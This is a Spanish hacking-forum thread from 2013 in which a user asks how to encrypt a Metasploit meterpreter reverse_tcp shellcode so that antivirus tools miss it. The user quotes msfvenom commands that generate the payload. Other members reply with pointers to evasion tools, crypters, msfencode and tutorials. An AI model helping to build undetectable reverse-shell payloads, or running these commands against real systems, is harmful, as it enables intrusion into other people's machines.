Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: Metadato en Junio 23, 2013, 06:37:45 AM

Título: [DUDA] Encriptar Shellcode
Publicado por: Metadato en Junio 23, 2013, 06:37:45 AM
Hola a todos!!! Bien, en esta ocasión tengo una duda que me está comiendo mucho la cabeza, por que busco y busco y no encuentro nada. Mi duda es que método o que hay que hacer para encriptar mi shellcode (de metasploit), he oído de alterar el shellcode pero no tengo ni idea de que hay que hacer, la shellcode a encriptar es la que me da de resultado al tipear lo siguiente en mi terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 C ó msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 -f c > shell.c (en C, que vendría a arrojar los mismo)


Las "XXX" las pongo para no poner la ip completa.

Y después de esto, ¿que hago con la shellcode, para hacer un ejecutable de windows?

LA VERDAD SOLO QUIERO TENER MI PAYLOAD FUD.

Saludós!!!
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: k0ws en Junio 23, 2013, 10:51:42 AM
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.

Por el foro hay un tuto del amigo sanko.

-Saludos-
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Metadato en Junio 23, 2013, 11:37:04 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.

Por el foro hay un tuto del amigo sanko.

-Saludos-

Hola, bueno  aunque sea semi fud, no importa, ya he visto el post de sanko pero no lo entiendo muy bien, aun que esto corresponde comentarlo en su post jaja, pero bueno si me puedes decir metodos de encriptar este shellcode? Y una cosa este code que me da luego lo compilo con un compilador de C ?
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Snifer en Junio 23, 2013, 03:06:32 PM
Puede usar shinigami haciendo uso de msfvenom ;)

http://www.sniferl4bs.com/2013/01/evadiendo-avs-con-python.html
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Metadato en Junio 24, 2013, 09:12:52 AM
Vale muchas gracias por su ayuda, pero aparte de este método, ¿no hay más? ¿Podría funcionar con algún cryper? Por favor, proporcionarme si podéis los mejores métodos.
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Snifer en Junio 24, 2013, 09:48:36 AM
Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)


Regards,
Snifer
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Metadato en Junio 24, 2013, 10:36:18 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)


Regards,
Snifer


¿Podrías proporcionar algún tutorial? Muchas gracias!!
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Kodeinfect en Junio 24, 2013, 10:56:45 AM
Por acá (http://www.commonexploits.com/?p=789) te dejo uno que te servirá, un saludo ;)
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Metadato en Junio 24, 2013, 11:15:41 AM
Muchas gracias por la información, ¿los payloads tambien se pueden encriptar con un crypter?

Saludos.
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Snifer en Junio 24, 2013, 06:29:05 PM
Una recomendacion antes de todo no se dice encriptar ya que no existe el termino si no es cifrar!

No es posible porq.
Título: Re:[DUDA] Encriptar Shellcode
Publicado por: Kodeinfect en Junio 24, 2013, 06:51:23 PM
Date un paso por acá (http://www.offensive-security.com/metasploit-unleashed/Msfencode)..
Te daré una pista ~$ msfencode  ;)

EDIT: Por acá te dejo un vídeo que también podría ayudarte.